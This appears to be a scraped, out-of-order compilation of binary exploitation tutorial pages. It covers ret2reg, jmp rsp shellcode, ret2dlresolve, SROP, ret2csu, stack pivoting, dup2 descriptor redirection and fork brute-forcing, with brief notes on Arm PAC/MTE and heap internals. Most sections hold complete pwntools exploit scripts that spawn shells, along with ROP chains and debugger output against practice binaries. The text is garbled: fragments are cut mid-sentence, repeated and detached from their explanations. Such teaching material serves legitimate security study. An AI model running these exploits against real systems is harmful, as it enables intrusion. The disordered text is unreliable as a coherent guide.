rop.raw(elf.got['puts']) # now our shellcode is written there, we can continue execution from there
p.recvline()
p.sendline(rop.chain())
p.sendline(asm(shellcraft.sh()))
p.interactive()
gem install one_gadget
one_gadget libc
Analysis
First, let's make sure that some register does point to the buffer:
Now we'll set a breakpoint on the ret in vuln(), continue and enter text.
We've hit the breakpoint, let's check if RAX points to our register. We'll assume RAX first because that's the traditional register to use for the return value.
And indeed it does!
Exploitation
We now just need a jmp rax gadget or equivalent. I'll use ROPgadget for this and look for either jmp rax or call rax:
There's a jmp rax at 0x40109c, so I'll use that. The padding up until RIP is 120; I assume you can calculate this yourselves by now, so I won't bother showing it.
You can ignore most of it as it's mostly there to accomodate the existence of jmp rsp - we don't actually want it called, so there's a negative if statement.
The chance of jmp esp gadgets existing in the binary are incredible low, but what you often do instead is find a sequence of bytes that code for jmp rsp and jump there - jmp rsp is \xff\xe4 in shellcode, so if there's is any part of the executable section with bytes in this order, they can be used as if they are a jmp rsp.
Exploitation
Try to do this yourself first, using the explanation on the previous page. Remember, RSP points at the thing after the return pointer once ret has occured, so your shellcode goes after it.
Solution
Limited Space
You won't always have enough overflow - perhaps you'll only have 7 or 8 bytes. What you can do in this scenario is make the shellcode after the RIP equivalent to something like
Where 0x20 is the offset between the current value of RSP and the start of the buffer. In the buffer itself, we put the main shellcode. Let's try that!
The 10 is just a placeholder. Once we hit the pause(), we attach with radare2 and set a breakpoint on the ret, then continue. Once we hit it, we find the beginning of the A string and work out the offset between that and the current value of RSP - it's 128!
Solution
We successfully pivoted back to our shellcode - and because all our addresses are relative, it's completely reliable! ASLR beaten with pure shellcode.
This is harder with PIE as the location of jmp rsp will change, so you might have to leak PIE base!
Exploitation
Source
To display an example program, we will use the example given on the pwntools entry for ret2dlresolve:
Exploitation
pwntools contains a fancy Ret2dlresolvePayload that can automate the majority of our exploit:
Let's use rop.dump() to break down what's happening.
As we expected - it's a read followed by a call to plt_init with the parameter 0x0804ce24. Our fake structures are being read in at 0x804ce00. The logging at the top tells us where all the structures are placed.
Now we know where the fake structures are placed. Since I ran the script with the DEBUG parameter, I'll check what gets sent.
system is being written to 0x804ce00 - as the debug said the Symbol name addr would be placed
After that, at 0x804ce0c, the Elf32_Sym struct starts. First it contains the table index of that string, which in this case is 0x4ba4 as it is a
After all the structures we place the string /bin/sh at 0x804ce24 - which, if you remember, was the argument passed to system when we printed the rop.dump():
To make it super simple, I made it in assembly using pwntools:
The binary contains all the gadgets you need! First it executes a read syscall, writes to the stack, then the ret occurs and you can gain control.
But what about the /bin/sh? I slightly cheesed this one and couldn't be bothered to add it to the assembly, so I just did:
Exploitation
As we mentioned before, we need the following layout in the registers:
To get the address of the gadgets, I'll just do objdump -d vuln. The address of /bin/sh can be gotten using strings:
The offset from the base to the string is 0x1250 (-t x tells strings to print the offset as hex). Armed with all this information, we can set up the constants:
Now we just need to populate the registers. I'll tell you the padding is 8 to save time:
And wehey - we get a shell!
ret2dlresolve
Resolving our own libc functions
Broad Overview
During a ret2dlresolve, the attacker tricks the binary into resolving a function of its choice (such as system) into the PLT. This then means the attacker can use the PLT function as if it was originally part of the binary, bypassing ASLR (if present) and requiring no libc leaks.
[0x7f8ac76fa090]> db 0x0040113d
[0x7f8ac76fa090]> dc
hello
hit breakpoint at: 40113d
[0x0040113d]> dr rax
0x7ffd419895c0
[0x0040113d]> ps @ 0x7ffd419895c0
hello
$ ROPgadget --binary vuln | grep -iE "(jmp|call) rax"
0x0000000000401009 : add byte ptr [rax], al ; test rax, rax ; je 0x401019 ; call rax
0x0000000000401010 : call rax
0x000000000040100e : je 0x401014 ; call rax
0x0000000000401095 : je 0x4010a7 ; mov edi, 0x404030 ; jmp rax
0x00000000004010d7 : je 0x4010e7 ; mov edi, 0x404030 ; jmp rax
0x000000000040109c : jmp rax
0x0000000000401097 : mov edi, 0x404030 ; jmp rax
0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x000000000040100c : test eax, eax ; je 0x401016 ; call rax
0x0000000000401093 : test eax, eax ; je 0x4010a9 ; mov edi, 0x404030 ; jmp rax
0x00000000004010d5 : test eax, eax ; je 0x4010e9 ; mov edi, 0x404030 ; jmp rax
0x000000000040100b : test rax, rax ; je 0x401017 ; call rax
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
JMP_RAX = 0x40109c
payload = asm(shellcraft.sh()) # front of buffer <- RAX points here
payload = payload.ljust(120, b'A') # pad until RIP
payload += p64(JMP_RAX) # jump to the buffer - return value of gets()
p.sendline(payload)
p.interactive()
#include <stdio.h>
int test = 0;
int main() {
char input[100];
puts("Get me with shellcode and RSP!");
gets(input);
if(test) {
asm("jmp *%rsp");
return 0;
}
else {
return 0;
}
}
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
'''
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 300;
syscall;
ret;
pop rax;
ret;
pop rdi;
ret;
pop rsi;
ret;
pop rdx;
ret;
'''
)
elf.save('vuln')
CSU Hardening
As of glibc 2.34, the CSU has been hardened to remove the useful gadgets. This patch is the offendor, and it essentially removes __libc_csu_init (as well as a couple other functions) entirely.
Unfortunately, changing this breaks the ABI (application binary interface), meaning that any binaries compiled in this way can not run on pre-2.34 glibc versions - which can make things quite annoying for CTF challenges if you have an outdated glibc version. Older compilations, however, can work on the newer versions.
very
long way off the actual table. Next it contains the other values on the struct, but they are irrelevant and so zeroed out.
At 0x804ce1c that Elf32_Rel struct starts; first it contains the address of the system string, 0x0804ce00, then the r_info variable - if you remember this specifies the R_SYM, which is used to link the SYMTAB and the STRTAB.
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
# we use elf.search() because we don't need those instructions directly,
# just anu sequence of \xff\xe4
jmp_rsp = next(elf.search(asm('jmp rsp')))
payload = flat(
'A' * 120, # padding
jmp_rsp, # RSP will be pointing to shellcode, so we jump there
asm(shellcraft.sh()) # place the shellcode
)
p.sendlineafter('RSP!\n', payload)
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
jmp_rsp = next(elf.search(asm('jmp rsp')))
payload = asm(shellcraft.sh())
payload = payload.ljust(120, b'A')
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 128;
jmp rsp;
''') # 128 we found with r2
p.sendlineafter('RSP!\n', payload)
p.interactive()
# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the correct, calculated reloc_offset
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
[DEBUG] PLT 0x8049030 read
[DEBUG] PLT 0x8049040 __libc_start_main
[DEBUG] Symtab: 0x804820c
[DEBUG] Strtab: 0x804825c
[DEBUG] Versym: 0x80482a6
[DEBUG] Jmprel: 0x80482d8
[DEBUG] ElfSym addr: 0x804ce0c
[DEBUG] ElfRel addr: 0x804ce1c
[DEBUG] Symbol name addr: 0x804ce00
[DEBUG] Version index addr: 0x8048c26
[DEBUG] Data addr: 0x804ce00
[DEBUG] PLT_INIT: 0x8049020
[*] 0x0000: b'AAAA' 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[...]
0x004c: 0x8049030 read(0, 0x804ce00)
0x0050: 0x804921a <adjust @0x5c> pop edi; pop ebp; ret
0x0054: 0x0 arg0
0x0058: 0x804ce00 arg1
0x005c: 0x8049020 [plt_init] system(0x804ce24)
0x0060: 0x4b44 [dlresolve index]
0x0064: b'zaab' <return address>
0x0068: 0x804ce24 arg0
[DEBUG] ElfSym addr: 0x804ce0c
[DEBUG] ElfRel addr: 0x804ce1c
[DEBUG] Symbol name addr: 0x804ce00
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)
# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the correct, calculated reloc_offset
log.info(rop.dump())
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
p.interactive()
echo -en "/bin/sh\x00" >> vuln
RAX: 0x3b
RDI: pointer to /bin/sh
RSI: 0x0
RDX: 0x0
Dynamically-linked ELF objects import libc functions when they are first called using the PLT and GOT. During the relocation of a runtime symbol, RIP will jump to the PLT and attempt to resolve the symbol. During this process a "resolver" is called.
For all these screenshots, I broke at read@plt. I'm using GDB with the pwndbg plugin as it shows it a bit better.
The PLT jumps to wherever the GOT points. Originally, before the GOT is updated, it points back to the instruction after the jmp in the PLT to resolve it.
In order to resolve the functions, there are 3 structures that need to exist within the binary. Faking these 3 structures could enable us to trick the linker into resolving a function of our choice, and we can also pass parameters in (such as /bin/sh) once resolved.
Structures
There are 3 structures we need to fake.
JMPREL
The JMPREL segment (.rel.plt) stores the Relocation Table, which maps each entry to a symbol.
These entries are of type Elf32_Rel:
The column name corresponds to our symbol name. The offset is the GOT entry for our symbol. info stores additional metadata.
Note the due to this the R_SYM of gets is 1 as 0x107 >> 8 = 1.
STRTAB
Much simpler - just a table of strings for the names.
0x0804825c is the location of STRTAB we got earlier
SYMTAB
Symbol information is stores here in an Elf32_Sym struct:
The most important value here is st_name as this gives the offset in STRTAB of the symbol name. The other fields are not relevant to the exploit itself.
Linking the Structures
We now know we can get the STRTAB offset of the symbol's string using the R_SYM value we got from the JMPREL, combined with SYMTAB:
Here we're reading SYMTAB + R_SYM * size (16), and it appears that the offset (the SYMTABst_name variable) is 0x10.
And if we read that offset on STRTAB, we get the symbol's name!
More on the PLT and GOT
Let's hop back to the GOT and PLT for a slightly more in-depth look.
If the GOT entry is unpopulated, we push the reloc_offset value and jump to the beginning of the .plt section. A few instructions later, the dl-resolve() function is called, with reloc_offset being one of the arguments. It then uses this reloc_offset to calculate the relocation and symtab entries.
File Descriptors are integers that represent conections to sockets or files or whatever you're connecting to. In Unix systems, there are 3 main file descriptors (often abbreviated fd) for each application:
Name
These are, as shown above, standard input, output and error. You've probably used them before yourself, for example to hide errors when running commands:
Here you're piping stderr to /dev/null, which is the same principle.
File Descriptors and Sockets
Many binaries in CTFs use programs such as socat to redirect stdin and stdout (and sometimes stderr) to the user when they connect. These are super simple and often require no more than a replacement of
With the line
Others, however, implement their own socket programming in C. In these scenarios, stdin and stdout may not be shown back to the user.
The reason for this is every new connection has a different fd. If you listen in C, since fd 0-2 is reserved, the listening socket will often be assigned fd 3. Once we connect, we set up another fd, fd 4 (neither the 3 nor the 4 is certain, but statistically likely).
Exploitation with File Desciptors
In these scenarios, it's just as simple to pop a shell. This shell, however, is not shown back to the user - it's shown back to the terminal running the server. Why? Because it utilises fd 0, 1 and 2 for its I/O.
Here we have to tell the program to duplicate the file descriptor in order to redirect stdin and stderr to fd 4, and glibc provides a simple way to do so.
The dup syscall (and C function) duplicates the fd and uses the lowest-numbered free fd. However, we need to ensure it's fd 4 that's used, so we can use dup2(). dup2 takes in two parameters: a newfd and an oldfd. Descriptor oldfd is duplicated to newfd, allowing us to interact with stdin and stdout and actually use any shell we may have popped.
Note that the outlines how if newfd is in use it is silently closed, which is exactly what we wish.
Using SROP
Source
As with the syscalls, I made the binary using the pwntools ELF features:
It's quite simple - a read syscall, followed by a pop rax; ret gadget. You can't control RDI/RSI/RDX, which you need to pop a shell, so you'll have to use SROP.
Once again, I added /bin/sh to the binary:
Exploitation
First let's plonk down the available gadgets and their location, as well as the location of /bin/sh.
From here, I suggest you try the payload yourself. The padding (as you can see in the assembly) is 8 bytes until RIP, then you'll need to trigger a sigreturn, followed by the values of the registers.
The triggering of a sigreturn is easy - sigreturn is syscall 0xf (15), so we just pop that into RAX and call syscall:
Now the syscall looks at the location of RSP for the register values; we'll have to fake them. They have to be in a specific order, but luckily for us pwntools has a cool feature called a SigreturnFrame() that handles the order for us.
Now we just need to decide what the register values should be. We want to trigger an execve() syscall, so we'll set the registers to the values we need for that:
However, in order to trigger this we also have to control RIP and point it back at the syscall gadget, so the execve actually executes:
We then append it to the payload and send.
Final Exploit
Exploitation
Source
Obviously, you can do a ret2plt followed by a ret2libc, but that's really not the point of this. Try calling win(), and to do that you have to populate the register rdx. Try what we've talked about, and then have a look at the answer if you get stuck.
Analysis
We can work out the addresses of the massive chains using r2, and chuck this all into pwntools.
Note I'm not popping RBX, despite the call. This is because RBX ends up being 0 anyway, and you want to mess with the least number of registers you need to to ensure the best success.
Exploitation
Finding a win()
Now we need to find a memory location that has the address of win() written into it so that we can point r15 at it. I'm going to opt to call gets() again instead, and then input the address. The location we input to is a fixed location of our choice, which is reliable. Now we just need to find a location.
To do this, I'll run r2 on the binary then dcu main to contiune until main. Now let's check permissions:
The third location is RW, so let's check it out.
The address 0x404028 appears unused, so I'll write win() there.
Reading in win()
To do this, I'll just use the ROP class.
Popping the registers
Now we have the address written there, let's just get the massive ropchain and plonk it all in
Sending it off
Don't forget to pass a parameter to the gets():
Final Exploit
And we have successfully controlled RDX - without any RDX gadgets!
Simplification
As you probably noticed, we don't need to pop off r12 or r13, so we can move POP_CHAIN a couple of intructions along:
Forking Processes
Flaws with fork()
Some processes use fork() to deal with multiple requests at once, most notably servers.
An interesting side-effect of fork() is that memory is copied exactly. This means everything is identical - ELF base, libc base, canaries.
This "shared" memory is interesting from an attacking point of view as it allows us to do a byte-by-byte bruteforce. Simply put, if there is a response from the server when we send a message, we can work out when it crashed. We keep spamming bytes until there's a response. If the server crashes, the byte is wrong. If not, it's correct.
This allows us to bruteforce the RIP one byte at a time, essentially leaking PIE - and the same thing for canaries and RBP. 24 bytes of multithreaded bruteforce, and once you leak all of those you can bypass a canary, get a stack leak from RBP and PIE base from RIP.
I won't be making a binary for this (yet), but you can check out for HTB - Rope root was this exact technique.
Exploitation
Stack Pivoting
Source
It's fairly clear what the aim is - call winner() with the two correct parameters. The fgets() means there's a limited number of bytes we can overflow, and it's not enough for a regular ROP chain. There's also a leak to the start of the buffer, so we know where to set RSP to.
We'll try two ways - using pop rsp
Sigreturn-Oriented Programming (SROP)
Controlling all registers at once
Overview
A sigreturn is a special type of . The purpose of sigreturn is to return from the signal handler and to clean up the stack frame after a signal has been unblocked.
What this involves is storing all the register values on the stack. Once the signal is unblocked, all the values are popped back in (RSP points to the bottom of the sigreturn frame, this collection of register values).
Socat
More on socat
socat is a "multipurpose relay" often used to serve binary exploitation challenges in CTFs. Essentially, it transfers stdin and stdout to the socket and also allows simple forking capabilities. The following is an example of how you could host a binary on port 5000:
Most of the command is fairly logical (and the rest you can look up). The important part is that in this scenario we don't have to , as socat does it all for us.
What is important, however, is pty
Stack Pivoting
Lack of space for ROP
Overview
Stack Pivoting is a technique we use when we lack space on the stack - for example, we have 16 bytes past RIP. In this scenario, we're not able to complete a full ROP chain.
During Stack Pivoting, we take control of the RSP register and "fake" the location of the stack. There are a few ways to do this.
leave
Using leave; ret to stack pivot
Exploitation
By calling leave; ret twice, as described, this happens:
By controlling the value popped into RBP, we can control RSP.
Exploit
Duplicating the Descriptors
Source
I'll include source.c, but most of it is socket programming derived from . The two relevent functions - vuln() and win() - I'll list below.
Quite literally an easy
$readelf -d source
Dynamic section at offset 0x2f14 contains 24 entries:
Tag Type Name/Value
0x00000005 (STRTAB) 0x804825c
0x00000006 (SYMTAB) 0x804820c
0x00000017 (JMPREL) 0x80482d8
[...]
$readelf -r source
Relocation section '.rel.dyn' at offset 0x2d0 contains 1 entry:
Offset Info Type Sym.Value Sym. Name
0804bffc 00000206 R_386_GLOB_DAT 00000000 __gmon_start__
Relocation section '.rel.plt' at offset 0x2d8 contains 2 entries:
Offset Info Type Sym.Value Sym. Name
0804c00c 00000107 R_386_JUMP_SLOT 00000000 gets@GLIBC_2.0
0804c010 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main@GLIBC_2.0
typedef uint32_t Elf32_Addr;
typedef uint32_t Elf32_Word;
typedef struct
{
Elf32_Addr r_offset; /* Address */
Elf32_Word r_info; /* Relocation type and symbol index */
} Elf32_Rel;
/* How to extract and insert information held in the r_info field. */
#define ELF32_R_SYM(val) ((val) >> 8)
#define ELF32_R_TYPE(val) ((val) & 0xff)
typedef struct
{
Elf32_Word st_name ; /* Symbol name (string tbl index) */
Elf32_Addr st_value ; /* Symbol value */
Elf32_Word st_size ; /* Symbol size */
unsigned char st_info ; /* Symbol type and binding */
unsigned char st_other ; /* Symbol visibility under glibc>=2.2 */
Elf32_Section st_shndx ; /* Section index */
} Elf32_Sym ;
By leveraging a sigreturn, we can control all register values at once - amazing! Yet this is also a drawback - we can't pick-and-choose registers, so if we don't have a stack leak it'll be hard to set registers like RSP to a workable value. Nevertheless, this is a super powerful technique - especially with limited gadgets.
Moving onto heap exploitation does not require you to be a god at stack exploitation, but it will require a better understanding of C and how concepts such as pointers work. From time to time we will be discussing the glibc source code itself, and while this can be really overwhelming, it's incredibly good practise.
I'll do everything I can do make it as simple as possible. Most references (to start with) will be hyperlinks, so feel free to just keep the concept in mind for now, but as you progress understanding the source will become more and more important.
Occasionally different snippets of code will be from different glibc versions, and I'll do my best to note down which version they are from. The reason for this is that newer versions have a lot of protections that will obscure the basic logic of the operation, so we will start with older implementations and build up.
Pointer Authentication
An Arm hardware protection to combat ROP
Overview
Pointer Authentication is a hardware feature available for Arm devices to protect against ROP attacks. A Pointer Authentication Code (PAC) is generated from the value of a given pointer, and must be used to verify pointers before using them. This protection requires hardware support, as the assembly instructions (such as paciasp and retaa) that are required for this must exist on the processor, and compiler support.
PAC has two keys, called Key A and Key B. The instruction paciasp will sign the Link Register (lr) using Key A and the SP register, and is often used at function entry (to store the return pointer). pacibsp will do the same, but with Key B.
At function exit, when LR is popped off the stack, we use the retaa instruction instead. This instruction authenticates the address in LR using Key A and SP and branches to the authenticated address. retab is used for Key B instead.
mode allows you to communicate with the process as if you were a user, it takes in input literally -
including DELETE characters
. If you send a
\x7f
- a
DELETE
- it will
literally
delete the previous character (as shown shortly in my
writeup). This is incredibly relevant because in 64-bit the \x7f is almost always present in glibc addresses, so it's not quite so possible to avoid (although you could keep rerunning the exploit until the rare occasion you get an 0x7e... libc base).
To bypass this we use the socatpty escape character \x16 and prepend it to any \x7f we send across.
Possibly the simplest, but also the least likely to exist. If there is one of these, you're quite lucky.
xchg <reg>, rsp
If you can find a pop <reg> gadget, you can then use this xchg gadget to swap the values with the ones in RSP. Requires about 16 bytes of stack space after the saved return pointer:
leave; ret
This is a very interesting way of stack pivoting, and it only requires 8 bytes.
Every function (except main) is ended with a leave; ret gadget. leave is equivalent to
Note that the function ending therefore looks like
That means that when we overwrite RIP the 8 bytes before that overwrite RBP (you may have noticed this before). So, cool - we can overwrite rbp using leave. How does that help us?
Well if we look at leave again, we noticed the value in RBP gets moved to RSP! So if we call overwrite RBP then overwrite RIP with the address of leave; ret again, the value in RBP gets moved to RSP. And, even better, we don't need any more stack space than just overwriting RIP, making it very compressed.
Gadgets
As before, but with a difference:
Testing the leave
I won't bother stepping through it again - if you want that, check out the pop rsp walkthrough.
Essentially, that pops buffer into RSP (as described previously).
Full Payload
You might be tempted to just chuck the payload into the buffer and boom, RSP points there, but you can't quite - as with the previous approach, there is a pop instruction that needs to be accounted for - again, remember leave is
So once you overwrite RSP, you still need to give a value for the pop rbp.
Final Exploit
find / -name secret.txt 2>/dev/null
p = process()
p = remote(host, port)
[...]
0x00401208 4c89f2 mov rdx, r14
0x0040120b 4c89ee mov rsi, r13
0x0040120e 4489e7 mov edi, r12d
0x00401211 41ff14df call qword [r15 + rbx*8]
0x00401215 4883c301 add rbx, 1
0x00401219 4839dd cmp rbp, rbx
0x0040121c 75ea jne 0x401208
0x0040121e 4883c408 add rsp, 8
0x00401222 5b pop rbx
0x00401223 5d pop rbp
0x00401224 415c pop r12
0x00401226 415d pop r13
0x00401228 415e pop r14
0x0040122a 415f pop r15
0x0040122c c3 ret
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
[0x00401199]> dm
0x0000000000400000 - 0x0000000000401000 - usr 4K s r--
0x0000000000401000 - 0x0000000000402000 * usr 4K s r-x
0x0000000000402000 - 0x0000000000403000 - usr 4K s r--
0x0000000000403000 - 0x0000000000404000 - usr 4K s r--
0x0000000000404000 - 0x0000000000405000 - usr 4K s rw-
rop.raw(POP_CHAIN)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function!
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's written
print(p.recvline()) # should receive "Awesome work!"
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function!
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's written
print(p.recvline()) # should receive "Awesome work!"
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
rop = ROP(elf)
POP_CHAIN = 0x00401228 # pop r14, pop r15, ret
REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function!
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win']))
print(p.recvline())
// gcc source.c -o vuln -no-pie
#include <stdio.h>
void winner(int a, int b) {
if(a == 0xdeadbeef && b == 0xdeadc0de) {
puts("Great job!");
return;
}
puts("Whelp, almost...?");
}
void vuln() {
char buffer[0x60];
printf("Try pivoting to: %p\n", buffer);
fgets(buffer, 0x80, stdin);
}
int main() {
vuln();
return 0;
}
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')
pop <reg> <=== return pointer
<reg value>
xchg <rag>, rsp
So we have a shell, but no way to control it. Time to use dup2.
I've simplified this challenge a lot by including a call to dup2() within the vulnerable binary, but normally you would leak libc via the GOT and then use libc's dup2() rather than the PLT; this walkthrough is about the basics, so I kept it as simple as possible.
Duplicating File Descriptors
As we know, we need to call dup2(newfd, oldfd). newfd will be 4 (our connection fd) and oldfd will be 0 and 1 (we need to call it twice to redirect bothstdin and stdout). Knowing what you do about calling conventions, have a go at doing this and then caling win(). The answer is below.
Using dup2()
Since we need two parameters, we'll need to find a gadget for RDI and RSI. I'll use ROPgadget to find these.
Plonk these values into the script.
Now to get all the calls to dup2().
And wehey - the file descriptors were successfully duplicated!
Final Exploit
Pwntools' ROP
These kinds of chains are where pwntools' ROP capabilities really come into their own:
Works perfectly and is much shorter and more readable!
Much like with Pointer Authentication, Arm consistently comes out with hardware-enabled protections that provide greater security. MTE, as it is called, is a hardware-based defence against memory safety vulnerabilities.
There are two common mistakes in memory management that commonly cause vulnerabilities:
Vulnerability Type
Examples
Description
MTE aims to mitigate both of these vulnerabilities using a "lock" and "key" system.
Operation: Tagging
Within the lock and key system, there are two types of tagging:
Address Tagging (the key) - adds a four-bit "tag" to the top of every pointer used in the program; this only works in 64-bit applications since it uses "top-byte-ignore", an Arm 64-bit feature
Memory Tagging (the lock) - also consists of four bits, linked to every 16-byte aligned region in the applications memory space (these regions are referred to as tag granules)
The idea is that, through address tagging, a pointer can only access a region of memory if the memory tag matches the address tag. Let's take some from :
The pointer p is "tagged" with the green tag, but is attempting to access memory that is tagged purple. The processor notes that the tag of the pointer is different to that of the purple tag, and throws an error.
On initial allocation via malloc, 2N bytes of space is tagged green, and the pointer is tagged green. Then, when the green pointer is freed, the green memory is retagged to red. If the green pointer is then used again, the processor will notice a difference in tag and throw an error.
How is MTE used?
There are : , and .
Synchronous mode is optimized for correctness of bug detection and has the highest overhead; on a tag mismatch, the process terminates with SIGSEGV immediately
Asynchronous is optimized for performance; on a tag mismatch, the process continues execution until the nearest kernel entry, and then terminates with SIGSEGV
Asymmetric is an improvement on Asynchronous in pretty much every way, doing synchronous checking on reads and asynchronous on writes
Android suggests using SYNC mode for testing to catch bugs, and use ASYMM in production (or ASYNC if ASYMM does not exist in the processor) due to the lower overhead.
While MTE is incredibly powerful, it is sometimes too powerful, and as a result it is not always enabled by default. Many apps with buggy invalid accesses work perfectly fine silently, but will cause a full crash if MTE is enabled. As a result MTE is not forced upon user-installed apps on either Android or iOS. Due to performance concerns, MTE is not enabled by default for the Android kernel either.
Enhanced MTE
This is a set of modifications made to MTE , through collaboration with Arm. I can find little information about it except under the heading FEAT_MTE4, Enhanced Memory Tagging Extension. It is very much linked to Apple's new security mitigation, which is found in their very latest iPhones. We can expect to see this in the new Apple Silicon chips.
Unlike the stack, heap is an area of memory that can be dynamically allocated. This means that when you need new space, you can "request" more from the heap.
In C, this often means using functions such as malloc() to request the space. However, the heap is very slow and can take up tons of space. This means that the developer has to tell libc when the heap data is "finished with", and it does this via calls to free() which mark the area as available. But where there are humans there will be implementation flaws, and no amount of protection will ever ensure code is completely safe.
In the following sections, we will only discuss 64-bit systems (with the exception of some parts that were written long ago). The theory is the same, but pretty much any heap challenge (or real-world application) will be on 64-bit systems.
Memory Integrity Enforcement
Malloc State
pop rsp
Using a pop rsp gadget to stack pivot
Exploitation
Gadgets
FIrst off, let's grab all the gadgets. I'll use ROPgadget again to do so:
Now we have all the gadgets, let's chuck them into the script:
Testing the pop
Let's just make sure the pop works by sending a basic chain and then breaking on ret and stepping through.
If you're careful, you may notice the mistake here, but I'll point it out in a sec. Send it off, attach r2.
You may see that only the gadget + 2 more values were written; this is because our buffer length is limited, and this is the reason we need to stack pivot. Let's step through the first pop.
You may notice it's the same as our "leaked" value, so it's working. Now let's try and pop the 0x0 into r13.
What? We passed in 0x0 to the gadget!
Remember, however, that pop r13 is equivalent to mov r13, [rsp] - the value from the top of the stack is moved into r13. Because we moved RSP, the top of the stack moved to our buffer and AAAAAAAA was popped into it - because that's what the top of the stack points to now.
Full Payload
Now we understand the intricasies of the pop, let's just finish the exploit off. To account for the additional pop calls, we have to put some junk at the beginning of the buffer, before we put in the ropchain.
Final Exploit
Chunks
Internally, every chunk - whether allocated or free - is stored in a malloc_chunkstructure. The difference is how the memory space is used.
Allocated Chunks
When space is allocated from the heap using a function such as malloc(), a pointer to a heap address is returned. Every chunk has additional metadata that it has to store in both its used and free states.
The chunk has two sections - the metadata of the chunk (information about the chunk) and the user data, where the data is actually stored.
The size field is the overall size of the chunk, including metadata. It must be a multiple of 8, meaning the last 3 bits of the size are 0. This allows the flags A, M and P to take up that space, with A being the 3rd-last bit of size, M the 2nd-last and P the last.
The flags have special uses:
P is the , which is set when the previous adjacent chunk (the chunk ahead) is in use
M is the , which is set when the chunk is allocated via mmap() rather than a heap mechanism such as malloc()
prev_size is set , as calculated by P being 0. If it is not, the heap saves space and prev_size is part of the previous chunk's user data. If it is, then prev_size stores the size of the previous chunk.
Free Chunks
Free chunks have additional metadata to handle the linking between them.
This can be seen in the struct:
malloc_consolidate()
Consolidating fastbins
Earlier, I said that chunks that went to the unsorted bin would consolidate, but fastbins would not. This is technically not true, but they don't consolidate automatically; in order for them to consolidate, the function malloc_consolidate() has to be called. This function looks complicated, but it essentially just grabs all adjacent fastbin chunks and combines them into larger chunks, placing them in the unsorted bin.
Why do we care? Well, UAFs and the like are very nice to have, but a Read-After-Free on a fastbin chunk can only ever leak you a heap address, as the singly-linked lists only use the fd pointer which points to another chunk (on the heap) or is NULL. We want to get a libc leak as well!
If we free enough adjacent fastbin chunks at once and trigger a call to malloc_consolidate(), they will consolidate to create a chunk that goes to the unsorted bin. The unsorted bin is doubly-linked, and acts accordingly - if it is the only element in the list, both fd and bk will point to a location in malloc_state, which is contained within libc.
This means that the more important thing for us to know is how we can trigger a largebin consolidation.
Some of the most important ways include:
Inputting a very long number into scanf (around 0x400 characters long)
This works because the code responsible for it manages a scratch_buffer and assigns it 0x400 bytes, but uses malloc when the data is too big (along with realloc
Both of these work because a largebin allocation triggersmalloc_consolidate.By checking the calls to the function in (2.35), we can find other triggers.
It's possible for earlier or later glibc versions to have a greater or lesser number of calls to a specific function, so make sure to check for your version! You may find another way exists.
The most common and most important trigger, a call to malloc() requesting a chunk of largebin size will .
There is another call to it in the section . This section is called when the top chunk has to be used to service the request. The checks if the top chunk is large enough to service the request:
If not, checks if there are fastchunks in the arena. If there are, it calls malloc_consolidate to attempt to regain space to service the request!
So, by filling the heap and requesting another chunk, we can trigger a call to malloc_consolidate().
(If both conditions fail,
Heap Overflow
Heap Overflow, much like a Stack Overflow, involves too much data being written to the heap. This can result in us overwriting data, most importantly pointers. Overwriting these pointers can cause user input to be copied to different locations if the program blindly trusts data on the heap.
To introduce this (it's easier to understand with an example) I will use two vulnerable binaries from Phoenix, formerly Protostar.
